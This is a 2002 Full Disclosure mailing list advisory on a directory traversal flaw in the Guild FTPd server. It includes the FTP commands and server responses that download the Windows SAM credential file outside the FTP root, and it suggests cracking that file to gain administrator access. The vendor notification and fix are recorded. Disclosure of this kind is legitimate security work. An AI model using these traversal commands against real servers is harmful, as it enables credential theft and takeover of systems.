Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Guild FTPd Exploit

From: full-disclosure () mike-c com (Mike C)
Date: Mon, 9 Sep 2002 02:54:21 +0100
______________________________________________________________________
Product Information

Guild FTPd 0.999.5
Released 4th July 2002
http://www.nitrolic.com

Guild FTPd is an ftp server which is growing ever more popular due to
its link with IRC. It can detect if the people on your FTP are in in
the same channels you are, and kick/ban them accordingly.  This is
useful if you wish to keep your ftp data a little more private.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
____________________________________________________________
Exploit Information

Author: Mike C
Date:   7th September 2002

Description:
Using a simple exploit in Guild FTPd, we can download any
file on the same hard drive as the ftp root folder.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
__________________________________________________
SAM SECURITY FILE
LOCAL PATH      =  C:\windows\repair\sam
FTP ROOT        =  C:\ftp
RELATIVE PATH   =  ../windows/repair/sam
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

1) We try to download the sam file using a relative path to the ftp root


ftp> GET "../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576
bytes).
425 Download failed.
ftp>


2) We get a 'Download failed' message, along with a filesize,
   confirming the file exists.  If the file doesn't exist, we get
   'Access denied: File not found.'


3) Adding a / to the start of the relative path seems to bypass the
   server's security relating to relative URLs.  Note however,
   that / doesn't escape the ftp root as you may except.
   Where '../foo.bar' is not accessible, '/../foo.bar' is.


ftp> GET "/../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576
bytes).
226 Transfer complete. 24576 bytes in 1 sec. (24.58 Kb/s).
ftp: 24576 bytes received in 2.08Seconds 11.80Kbytes/sec.
ftp>


4) We have just successfully exploited the server, managing to
   download the system's sam file.  An application such as l0phtcrack
   (http://www.atstake.com/research/lc/) could now be used to find
   the passwords, thus giving full administrative access to the
   exploited system.

______________________________________________________________________
Vendor Status:

The authors of Guild FTPd were notified on 7th September 2002.
The exploit has been fixed as of 8th September 2002.
A new version will be released on 15th September 2002.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Previous By Date Next
Previous By Thread Next

Current thread: